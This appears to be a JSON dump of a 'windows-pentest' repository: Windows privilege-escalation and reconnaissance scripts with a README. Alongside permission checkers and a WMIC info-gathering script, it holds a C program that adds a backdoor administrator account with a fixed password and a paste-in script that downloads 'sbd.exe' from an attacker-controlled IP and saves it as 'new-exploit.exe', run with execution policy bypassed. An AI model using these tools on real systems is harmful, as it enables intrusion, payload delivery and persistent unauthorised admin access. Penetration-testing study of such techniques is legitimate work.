[
  {
    "path": "Powershell/folderperms.ps1",
    "content": "# Author : Parvez Anwar (@parvezghh)\n# Date   : 17/11/13\n#\n# powershell.exe -executionpolicy bypass -file folderperm.ps1\n\n\n$numofpaths  = 0\n$countcopies = 0\n$filetocopy  = \"testfile.txt\"\n\n\n$myarray = (gi env:path).value.split(';')\n\nWrite-Host \"\" \nWrite-Host \"[i] Number of folder paths :\" $myarray.count\n\n# If the last path entry ends in semi-colon\n\nif ($myarray[$myarray.count-1] -eq \"\")\n{\n   $numofpaths = $myarray.count - 2\n}\nelse\n{\n   $numofpaths = $myarray.count - 1\n}\n\nNew-Item $filetocopy -type file | Out-Null\n\n$FileExists = (Test-Path $filetocopy)\n\nif (!($FileExists)) \n{\n    Write-Host \"[i] Dummy test file used to test access was not outputted:\" $filetocopy\n    exit\n}\n\nWrite-Host \"[i] Copying and removing test file to path folders where access is granted\"\n\nfor($i=0; $i -le $numofpaths; $i++)\n{\n if (Test-Path -Path $myarray[$i])\n {\n    Copy-Item $filetocopy $myarray[$i] -errorAction SilentlyContinue -errorVariable errors\n\n    if ($errors.count -le 0)\n    {\n        Write-Host -foregroundColor Green \"      Access granted:\" $myarray[$i] \n        $countcopies = $countcopies + 1\n        $filetoremove = $myarray[$i] + \"\\\" + $filetocopy\n        Remove-Item $filetoremove\n    }\n    else\n    {\n       Write-Host -foregroundColor Red \"      Access denied :\" $myarray[$i] \n    }\n }\n else\n {\n    Write-Host -foregroundColor Blue \"      Folder missing:\" $myarray[$i] \n }\n\n}\n\nRemove-Item $filetocopy \n\n\n"
  },
  {
    "path": "Powershell/powershell_download_file.txt",
    "content": "echo $storageDir = $pwd > wget.ps1\necho $webclient = New-Object System.Net.WebClient >>wget.ps1 \necho $url = \"http://10.11.0.36/sbd.exe\" >>wget.ps1 \necho $file = \"new-exploit.exe\" >>wget.ps1\necho $webclient.DownloadFile($url,$file) >>wget.ps1\n"
  },
  {
    "path": "README.md",
    "content": "# windows-pentest\nWindows Pentest Scripts and Tools.\n\n\n#### wmic-info - Retrieve system info.\nUses WMIC to gather various important information about a Windows host and dump it to HTML.\n\n#### icacls.bat - Weak permissions on Services.\n* Script that queries all services. \n* Removes default tasks and anything Microsoft related. \n* Then checks the BINARY_PATHS for any executables that have the Everyone or Usergroup set with RW access.\n\n#### schcheck.bat - Weak permissions on scheduled task executables.\n* Lists all scheduled tasks. \n* Runs the list of executables against icacls and checks if any allow Everyone RW permissions.\n\n#### adduser.c - Creates user and adds to administrator group.\n* Creates a user called sharepoint with password sharepoint. Adds the user to the local administrators group. \n* To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c \n\n\n#### Powershell/powershell_download_file.txt - Create wget powershell script to download external files.\n\n* Copy file contents to clipboard using > `cat powershell_download_file.txt | xclip -selection clipboard`\n* Paste into a Windows command prompt, which will create a **wget.ps1**\n* `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1`\n\n#### Privelege/Accesschk-2003-xp.exe & accesschk-2008-vista.exe\n##### Identify the level of access a particular user or group has to files, directories and Registry keys.\n\nWhen executing any of the sysinternals tools for the first time the user will be presented with a GUI\npop-up to accept the EULA. This is obviously a big problem, however we can add an extra command line flag\nto automatically accept the EULA.\n\n     accesschk.exe /accepteula \n\nThe following command reports the access that the Power Users account has to files and directories in \\Windows\\System32:\n\n     accesschk \"power users\" c:\\windows\\system32\n\nThis command shows which Windows services members of the Users group have write access to:\n\n     accesschk users -cw *\n\nCheck what access authenticated users have to services:\n\n     accesschk.exe -uwcqv \"Authenticated Users\" *\n\nCheck which Windows services a user called adam.dale has write access to:\n\n      accesschk.exe -uwcqv adam.dale *\n\nCheck what access permissions are set on the service called NetLogon:\n\n     accesschk.exe -ucqv NetLogon\n\nFind all weak folder permissions per drive:\n\n     accesschk.exe -uwdqs Users c:\\\n     accesschk.exe -uwdqs \"Authenticated Users\" c:\\\n\nFind all weak file permissions per drive:\n\n     accesschk.exe -uwqs Users c:\\*.*\n     accesschk.exe -uwqs \"Authenticated Users\" c:\\*.*\n\n\nTo see what Registry keys under HKLM\\CurrentUser a specific account has no access to:\n\n     accesschk -kns austin\\mruss hklm\\software\n\nTo see the security on the HKLM\\Software key:\n\n     accesschk -k hklm\\software\n\nTo see all files under \\Users\\Mark on Vista that have an explicit integrity level:\n\n     accesschk -e -s c:\\users\\mark\n\nTo see all global objects that Everyone can modify:\n\n     accesschk -wuo everyone \\basednamedobjects\n\n#### Powershell/folderperms.ps1\n##### Checks for folders in the current PATH variable that are writeable for all authenticated users.\n\nWhen new folders are created in the root they are writeable by all authenticated users by default. The “NT AUTHORITY\\Authenticated Users:(I)(M)” entry gets added to the folder, where M stands for modify access. So any application that gets installed in the root can be tampered with by a non-admin user. \n\nThe script checks for any of those folders that are writeable by authenticated users.\n"
  },
  {
    "path": "adducer.c",
    "content": "#include <stdlib.h> /* system, NULL, EXIT_FAILURE */\n/* Creates a user called sharepoint with password sharepoint. Add's user to local administrators group. */\n/* To cross compile on kali - i686-w64-mingw32-gcc -o useradd.exe useradd.c */\nint main () {\nint i;\ni=system (\"net user sharepoint sharepoint /add & net localgroup administrators sharepoint /add\"); return 0;\n}\n"
  },
  {
    "path": "icacls.bat",
    "content": "@echo off\nREM Description: Script that queries all services and searches for exeuctables that give the Everyone group RW access.\nREM Type: Incorrect file permissions\nREM Note: The ^ characters escapes certain characters that brerak the FOR loop.\nREM Note: tokens=1* - The value at the first delimeter and everything after. \nfor /f \"tokens=1*\" %%m in ('sc query state^= all ^| find \"SERVICE_NAME\"') do (\n    for /f \"tokens=1* delims=: \" %%r in ('sc qc \"%%~n\" ^| find \"BINARY_PATH_NAME\"') do (\n        for /f \"delims=\" %%x in ('echo(%%~s^| findstr /L /V /I /C:\"%SystemRoot%\\System32\" /C:\"%SystemRoot%\\SysWOW64\"') do (\n            icacls \"%%~x\"\n        )\n    )\n)\n"
  },
  {
    "path": "schcheck.bat",
    "content": "@echo off\nREM - Lists all schededuled tasks. Runs list of executables against icacls and checks if any allow Everyone RW permissions.\nREM - Note: At present the script only ECHO's tasks.\nfor /f  \"tokens=3* delims=: \" %%m in ('schtasks /query /v /fo LIST ^| find \"Task To Run:\"') do (\n\tfor /f \"tokens=1* delims=?\" %%x in ('echo(%%~n^| findstr /L /V /I /C:\"COM handler\" /C:\"multiple\" /C:\"%SystemRoot%\" /C:\"shutdown\"') do (\n\tECHO %%~x REM  > results.txt\n\t)\n )\n"
  },
  {
    "path": "wmic-info",
    "content": "for /f \"delims=\" %%A in ('dir /s /b %WINDIR%\\system32\\*htable.xsl') do set \"var=%%A\"\n\nwmic process get CSName,Description,ExecutablePath,ProcessId /format:\"%var%\" >> out.html\nwmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:\"%var%\" >> out.html\nwmic USERACCOUNT list full /format:\"%var%\" >> out.html\nwmic group list full /format:\"%var%\" >> out.html\nwmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:\"%var%\" >> out.html\nwmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:\"%var%\" >> out.html\nwmic netuse list full /format:\"%var%\" >> out.html\nwmic qfe get Caption,Description,HotFixID,InstalledOn /format:\"%var%\" >> out.html\nwmic startup get Caption,Command,Location,User /format:\"%var%\" >> out.html\nwmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:\"%var%\" >> out.html\nwmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:\"%var%\" >> out.html\nwmic Timezone get DaylightName,Description,StandardName /format:\"%var%\" >> out.html\n"
  }
]